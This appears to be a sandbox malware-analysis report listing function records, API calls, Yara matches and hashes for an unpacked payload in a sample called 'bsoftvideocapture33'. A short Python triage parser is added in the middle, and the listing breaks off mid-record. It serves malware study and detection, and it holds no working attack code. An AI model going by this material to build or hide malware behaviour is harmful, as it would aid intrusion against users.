• Instruction ID: 4f86709b2de0772096345983ac44a74b7da2dfdbd41989979c733e18e9e2b49e
• Opcode Fuzzy Hash: d65889ccb2b6559ef41bc7178158de66d61122d3710eeb4a27dd702920ca0742
• Instruction Fuzzy Hash: 93314B715047019FC324DF25D888A6BB7F9FFD8654F144A1EE89683690DB30E909CB92

APIs
  • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
• sqlite3_mutex_enter.SQLITE3 ref: 6093A114
• sqlite3_mutex_free.SQLITE3 ref: 6093A152
• sqlite3_mutex_leave.SQLITE3 ref: 6093A162
• sqlite3_free.SQLITE3 ref: 6093A1A4
• sqlite3_free.SQLITE3 ref: 6093A1C3
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
• String ID:
• API String ID: 1894464702-0
• Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
• Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
• Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
• Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91

APIs
• __EH_prolog.LIBCMT ref: 02C0D102
  • Part of subcall function 02C01A01: TlsGetValue.KERNEL32 ref: 02C01A0A
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C0D181
• RtlEnterCriticalSection.NTDLL(?), ref: 02C0D19D
• InterlockedIncrement.KERNEL32(02C330F0), ref: 02C0D1C2
• RtlLeaveCriticalSection.NTDLL(?), ref: 02C0D1D7
  • Part of subcall function 02C027F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C0284E
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
• String ID:
• API String ID: 1578506061-0
• Opcode ID: 01447b352b4bb0946f5593094ae3491ab733437f32cb7beab2334abd2789541b
• Instruction ID: 1294d26d239d1b7d5f3324ca540072b888e43e5e856be04ea763f3f2e48a2385
• Opcode Fuzzy Hash: 01447b352b4bb0946f5593094ae3491ab733437f32cb7beab2334abd2789541b
• Instruction Fuzzy Hash: D03138B1D012049FCB60DFA9D8846AABBF8FF48314F14455ED84AD7640EB74AA14CFA0
APIs
  • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
• sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
• sqlite3_mutex_leave.SQLITE3 ref: 609253C4
• sqlite3_log.SQLITE3 ref: 609253E2
• sqlite3_log.SQLITE3 ref: 60925406
• sqlite3_mutex_leave.SQLITE3 ref: 60925443
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
• String ID:
• API String ID: 3336957480-0
• Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
• Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
• Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
• Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
APIs
• sqlite3_result_blob.SQLITE3 ref: 609613D0
• sqlite3_column_int.SQLITE3 ref: 6096143A
• sqlite3_data_count.SQLITE3 ref: 60961465
• sqlite3_column_value.SQLITE3 ref: 60961476
• sqlite3_result_value.SQLITE3 ref: 60961482
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
• String ID:
• API String ID: 3091402450-0
• Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
• Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
• Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
• Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
APIs
• WSASetLastError.WS2_32(00000000), ref: 02C02A3B
• closesocket.WS2_32 ref: 02C02A42
• ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C02A89
• WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02C02A97
• closesocket.WS2_32 ref: 02C02A9E
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: ErrorLastclosesocket$ioctlsocket
• String ID:
• API String ID: 1561005644-0
• Opcode ID: f9483e0abec58f7de19c507bb9fd0aee86f8ef8852ce7521ee33dd874398b3db
• Instruction ID: f14f22b84b540906c0076c1deb2647a8f5bebc21cc8f2fcfa00159ef83aeaf2c
• Opcode Fuzzy Hash: f9483e0abec58f7de19c507bb9fd0aee86f8ef8852ce7521ee33dd874398b3db
• Instruction Fuzzy Hash: 5B210371E40305AFEB34ABB9C88876E76E99F84355F114A6DE905C32C1EF708A448B62
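The function blocks in this listing come from two different memory regions: the dump at 02C01000 is not backed by a PE on disk and carries Yara matches (the unpacked payload), while the dump at 60900000 is PE-backed and only calls into SQLITE3 (a loaded SQLite library). When triaging a report like this, it helps to split the flat listing into records and keep only the functions in the injected, Yara-matched region that touch WS2_32. The parser below is an added example, not part of the Joe Sandbox report or its tooling; the sample input is two records constructed in the shape of the blocks above, and the ioctlsocket command table covers only FIONBIO (0x8004667E, the value in the ioctlsocket call above) and FIONREAD (0x4004667F), which are standard Winsock constants.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Winsock ioctlsocket() command codes; 8004667E appears as the second
# argument of ioctlsocket() in the listing (FIONBIO = non-blocking toggle).
IOCTL_NAMES = {
    0x8004667E: "FIONBIO",
    0x4004667F: "FIONREAD",
}

# Constructed sample in the report's own layout (two records, abridged).
SAMPLE = """\
APIs
• WSASetLastError.WS2_32(00000000), ref: 02C02A3B
• closesocket.WS2_32 ref: 02C02A42
• ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C02A89
• WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02C02A97
• closesocket.WS2_32 ref: 02C02A9E
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Yara matches
Similarity
• API ID: ErrorLastclosesocket$ioctlsocket
• API String ID: 1561005644-0
• Instruction Fuzzy Hash: 5B210371E40305AFEB34ABB9C88876E76E99F84355F114A6DE905C32C1EF708A448B62
APIs
  • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
• sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
Similarity
• API ID: sqlite3_log$sqlite3_mutex_enter
• API String ID: 3336957480-0
• Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
"""

_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"          # e.g. ioctlsocket.WS2_32
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
_SOURCE_RE = re.compile(
    r"Source File:\s*\S+?,\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall_of: str | None = None  # set for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    offset: str = ""
    pe_backed: bool = True
    yara_match: bool = False
    api_string_id: str = ""
    fuzzy_hash: str = ""

    def modules(self) -> set[str]:
        return {c.module for c in self.calls}


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the flat listing into one record per function; each starts at 'APIs'."""
    records: list[FunctionRecord] = []
    rec = None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            rec = FunctionRecord()
            records.append(rec)
            continue
        if rec is None:
            continue  # anything before the first record
        if m := _CALL_RE.match(line):
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            rec.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                     m.group("ref"), m.group("sub")))
        elif m := _SOURCE_RE.search(s):
            rec.offset = m.group("offset")
            rec.pe_backed = m.group("pe") == "true"
        elif s == "Yara matches":
            rec.yara_match = True
        elif s.startswith("• API String ID:"):
            rec.api_string_id = s.split(":", 1)[1].strip()
        elif s.startswith("• Instruction Fuzzy Hash:"):
            rec.fuzzy_hash = s.split(":", 1)[1].strip()
    return records


def ioctl_name(arg: str) -> str:
    """Resolve a hex ioctlsocket command from the listing; '?' means unrecovered."""
    try:
        code = int(arg, 16)
    except ValueError:
        return f"unresolved({arg})"
    return IOCTL_NAMES.get(code, f"unknown(0x{code:08X})")


def injected_network_functions(records: list[FunctionRecord]) -> list[FunctionRecord]:
    """Functions in a non-PE-backed, Yara-matched region that call into WS2_32."""
    return [r for r in records
            if not r.pe_backed and r.yara_match and "WS2_32" in r.modules()]


if __name__ == "__main__":
    for r in injected_network_functions(parse_records(SAMPLE)):
        print(r.offset, r.api_string_id, [c.api for c in r.calls])
        for c in r.calls:
            if c.api == "ioctlsocket":
                print("  ioctlsocket command:", ioctl_name(c.args[1]))
```

Records whose "Source File" is PE-backed (here the SQLite library at 60900000) are library code and drop out of the filter; the Instruction Fuzzy Hash and API String ID of the surviving records are what you would carry over to compare against other samples.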
APIs
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
• String ID:
• API String ID: 251237202-0
• Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
• Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
• Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
• Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
APIs
• __EH_prolog.LIBCMT ref: 02C01BAC
• RtlEnterCriticalSection.NTDLL ref: 02C01BBC
• RtlLeaveCriticalSection.NTDLL ref: 02C01BEA
• RtlEnterCriticalSection.NTDLL ref: 02C01C13
• RtlLeaveCriticalSection.NTDLL ref: 02C01C56
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave$H_prolog
• String ID:
• API String ID: 1633115879-0
• Opcode ID: f6f871209490cefbb83f52e66827a1e141db5d31dcd5d4ee465fa81e3bc0a1be
• Instruction ID: dd115f1c50948f5feb1e63a477b92c12be89895d15ad4e7b273df5ba86fdf40a
• Opcode Fuzzy Hash: f6f871209490cefbb83f52e66827a1e141db5d31dcd5d4ee465fa81e3bc0a1be
• Instruction Fuzzy Hash: 1B21CCB1900604DFCB14CF68C8847AAFBB5FF88724F158549E80997340DBB1EA09CBE0
APIs
• sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
• sqlite3_value_text.SQLITE3 ref: 6091A349
• sqlite3_value_bytes.SQLITE3 ref: 6091A356
• sqlite3_value_text.SQLITE3 ref: 6091A37B
• sqlite3_value_bytes.SQLITE3 ref: 6091A387
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
• String ID:
• API String ID: 4225432645-0
• Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
• Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
• Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
• Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
APIs
• _malloc.LIBCMT ref: 02C1E8B0
  • Part of subcall function 02C11FBC: __FF_MSGBANNER.LIBCMT ref: 02C11FD3
  • Part of subcall function 02C11FBC: __NMSG_WRITE.LIBCMT ref: 02C11FDA
  • Part of subcall function 02C11FBC: RtlAllocateHeap.NTDLL(00880000,00000000,00000001), ref: 02C11FFF
• _free.LIBCMT ref: 02C1E8C3
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: AllocateHeap_free_malloc
• String ID:
• API String ID: 1020059152-0
• Opcode ID: 6a753e6d5189d683d9ef94b580af0cdd162b3d4e4b9b737dd91272570b5cf076
• Instruction ID: d4cbe31e86ae371d3dc8bb7168e933db23c6c307edef274e645b732b1c172721
• Opcode Fuzzy Hash: 6a753e6d5189d683d9ef94b580af0cdd162b3d4e4b9b737dd91272570b5cf076
• Instruction Fuzzy Hash: FD11C632D44611ABDF743F74A80679A379AAF03370F154A25ED09D6190DF358650FAD8
APIs
• __EH_prolog.LIBCMT ref: 02C021DA
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C021ED
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C02224
• TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C02237
• TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C02261
  • Part of subcall function 02C02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C02350
  • Part of subcall function 02C02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C02360
  • Part of subcall function 02C02341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C02370
  • Part of subcall function 02C02341: GetLastError.KERNEL32 ref: 02C0237A
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
• String ID:
• API String ID: 1856819132-0
• Opcode ID: b81d963af3200f348a77137e6b9016b2f4044138c0af10bc50afd3ac86703f79
• Instruction ID: dbed3dfb53fedcd86f3f4333245b650eb7e9fde9cd47138f53ca0a5cb22872e8
                                                                                                                                        • Opcode Fuzzy Hash: b81d963af3200f348a77137e6b9016b2f4044138c0af10bc50afd3ac86703f79
                                                                                                                                        • Instruction Fuzzy Hash: D2118171D00118EBCB159FE9DC487AEBBBAFF48350F004A1AEC15A22A0DB714A51DBD2
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0229D
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C022B0
                                                                                                                                        • TlsGetValue.KERNEL32 ref: 02C022E7
                                                                                                                                        • TlsSetValue.KERNEL32(?), ref: 02C02300
                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?), ref: 02C0231C
                                                                                                                                          • Part of subcall function 02C02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C02350
                                                                                                                                          • Part of subcall function 02C02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C02360
                                                                                                                                          • Part of subcall function 02C02341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C02370
                                                                                                                                          • Part of subcall function 02C02341: GetLastError.KERNEL32 ref: 02C0237A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1856819132-0
                                                                                                                                        • Opcode ID: 22385e1a4144031d9e38589cffe1df846c88a677cc3cbe759813f3c7fefc2db1
                                                                                                                                        • Instruction ID: e1150fd9871fa65c98bbba31b9cf4902fa4b991b5b47ac5865046426c5473249
                                                                                                                                        • Opcode Fuzzy Hash: 22385e1a4144031d9e38589cffe1df846c88a677cc3cbe759813f3c7fefc2db1
                                                                                                                                        • Instruction Fuzzy Hash: FF115E71D00118EBCB159FA5D8446AEBBBAFF48350F00451AEC05A3250DB714A65DFD1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02C0A16A: __EH_prolog.LIBCMT ref: 02C0A16F
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 02C0AD34
                                                                                                                                          • Part of subcall function 02C131CA: RaiseException.KERNEL32(?,?,02C0EB64,?,?,?,?,?,?,?,02C0EB64,?,02C2ECA8,?), ref: 02C1321F
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02C2FA1C,?,00000001), ref: 02C0AD4A
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C0AD5D
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02C2FA1C,?,00000001), ref: 02C0AD6D
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C0AD7B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2725315915-0
                                                                                                                                        • Opcode ID: bb5b7580637109592e681471ac30472bbd6c7f5dc614c44c1385b741cc27e64c
                                                                                                                                        • Instruction ID: 64e17565c6263305a23426cfd07b6dfaafb44f076c78492765ea9d7a3a0c636d
                                                                                                                                        • Opcode Fuzzy Hash: bb5b7580637109592e681471ac30472bbd6c7f5dc614c44c1385b741cc27e64c
                                                                                                                                        • Instruction Fuzzy Hash: 0E0181B6A54304AFDB149AA4DCC9F8B77ACAF043A5B418514F615D71D0DFA0E8189BA0
                                                                                                                                        APIs
                                                                                                                                        • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C02432
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C02445
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C02454
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C02469
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C02470
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 747265849-0
                                                                                                                                        • Opcode ID: 6c02304e68c1e5a8bf99282e66daaa059affba9a148f7653e6d0a0b34cf87b50
                                                                                                                                        • Instruction ID: ab46161420e18b99b478cc34ed208b52bd98c67b8c6c36257660f1ee80d5ebbc
                                                                                                                                        • Opcode Fuzzy Hash: 6c02304e68c1e5a8bf99282e66daaa059affba9a148f7653e6d0a0b34cf87b50
                                                                                                                                        • Instruction Fuzzy Hash: C2F04972690204BBD6149AA0ED8DFD7B72CFB44751F800411F701D6080DB61A628CAE5
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 02C01ED2
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C01EEA
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C01EF9
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C01F0E
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C01F15
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 830998967-0
                                                                                                                                        • Opcode ID: 9bb7b47daf3d3ec5df03ab18df309fc50788534ec689280f562543d365151945
                                                                                                                                        • Instruction ID: 06b75b51e25e8e59f9dbf6c921694e4ad4d5b45df864f0c1b419eae3e40a381d
                                                                                                                                        • Opcode Fuzzy Hash: 9bb7b47daf3d3ec5df03ab18df309fc50788534ec689280f562543d365151945
                                                                                                                                        • Instruction Fuzzy Hash: 21F06772690604BFD714AFA0EC88FD7BB6CFF08791F800512F20186480CB71A568CBE0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: ($string or blob too big$|
                                                                                                                                        • API String ID: 632333372-2398534278
                                                                                                                                        • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                                                                        • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                                                                        • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                                                                        • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                        • Opcode ID: d140107aa820ee0d117f79c8d24b2ad09d3b406a0abd4d416ff03246a50bfcf6
                                                                                                                                        • Instruction ID: 9cb4b749bcb77fea516ce6440c3ecd9cb4bd6c5d33cbc15e113a5a873bc4a9ff
                                                                                                                                        • Opcode Fuzzy Hash: d140107aa820ee0d117f79c8d24b2ad09d3b406a0abd4d416ff03246a50bfcf6
